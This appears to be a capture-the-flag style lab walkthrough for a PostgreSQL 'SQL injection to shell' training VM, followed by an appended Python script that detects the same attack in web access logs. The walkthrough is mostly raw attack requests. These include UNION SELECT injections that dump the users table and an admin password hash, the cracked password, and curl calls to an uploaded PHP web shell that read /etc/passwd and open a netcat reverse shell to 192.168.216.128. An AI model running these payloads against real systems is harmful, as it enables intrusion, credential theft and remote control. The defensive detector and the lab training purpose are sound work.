This exercise explains how to go from a SQL injection to access to the administration console, and then how to run commands on the system from that console.
From SQL Injection to Shell (PgSQL) VM Download
http://192.168.216.137/cat.php?id=1'
http://192.168.216.137/cat.php?id=1 ORDER BY 1
http://192.168.216.137/cat.php?id=1 ORDER BY 2
http://192.168.216.137/cat.php?id=1 ORDER BY 3
http://192.168.216.137/cat.php?id=1 ORDER BY 4
http://192.168.216.137/cat.php?id=1 ORDER BY 5
http://192.168.216.137/cat.php?id=-1 UNION SELECT 'a',null,null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,'a',null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,user,null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,current_database(),null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,tablename,null,null FROM pg_tables
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,column_name,null,null FROM information_schema.columns where table_name='users'
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,id||':'||login||':'||password,null,null FROM users
1:admin:8efe310f9ab3efeae8d410a8e0166eb2
P4ssw0rd
curl http://192.168.216.137/admin/uploads/shell.pHP?e=id
curl http://192.168.216.137/admin/uploads/shell.pHP?e=uname+-a
curl http://192.168.216.137/admin/uploads/shell.pHP?e=cat+/etc/passwd
curl http://192.168.216.137/admin/uploads/shell.pHP?e=which+nc
curl http://192.168.216.137/admin/uploads/shell.pHP?e=nc+-nv+192.168.216.128+443+-e+/bin/sh
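
Seen from the defender's side, the request sequence above leaves a recognizable trail in the web server's access log. The following detection example is added here and is not part of the original walkthrough: it tags non-integer id values sent to cat.php, the ORDER BY and UNION SELECT stages, and script requests under the uploads directory, grouped by client. Assumptions: an Apache-style access log, an id parameter that is meant to be a plain integer, and constructed log lines with documentation-range client addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the original page) mirroring the request shapes above.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 512
192.0.2.50 - - [01/Jan/2024:10:01:00 +0000] "GET /cat.php?id=1' HTTP/1.1" 200 130
192.0.2.50 - - [01/Jan/2024:10:01:05 +0000] "GET /cat.php?id=1%20ORDER%20BY%205 HTTP/1.1" 200 130
192.0.2.50 - - [01/Jan/2024:10:01:09 +0000] "GET /cat.php?id=-1%20UNION%20SELECT%20null,tablename,null,null%20FROM%20pg_tables HTTP/1.1" 200 900
192.0.2.50 - - [01/Jan/2024:10:05:00 +0000] "GET /admin/uploads/shell.pHP?e=id HTTP/1.1" 200 54
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# These rules are only checked against id values that are not plain integers.
RULES = [
    ("union-select", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("catalog-read", re.compile(r"\b(pg_tables|information_schema)\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
]
UPLOADED = re.compile(r"/uploads/[^/]+\.([A-Za-z0-9]+)$")

def classify(target):
    """Return detection tags for one request target (path plus query string)."""
    url = urlsplit(target)
    tags = []
    if url.path.endswith("/cat.php"):
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"\d+", value):  # assumption: id is meant to be an integer
                tags.append("non-integer-id")
                tags += [name for name, rx in RULES if rx.search(value)]
    ext = UPLOADED.search(url.path)
    if ext and ext.group(1).lower().startswith(("php", "pht")):
        tags.append("script-in-uploads")  # an upload directory should not serve scripts
        if ext.group(1) != ext.group(1).lower():
            tags.append("mixed-case-extension")  # e.g. .pHP, as in the requests above
    return tags

def scan(log_text):
    """Map client IP -> tags in first-seen order; clients with no tags are omitted."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for tag in classify(target):
            seen = findings.setdefault(ip, [])
            if tag not in seen:
                seen.append(tag)
    return findings

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, " -> ".join(tags))
```

A client that accumulates the SQL tags and then a script-in-uploads tag has followed the whole chain; the non-integer-id tag alone is also the condition the application itself should reject before building the query.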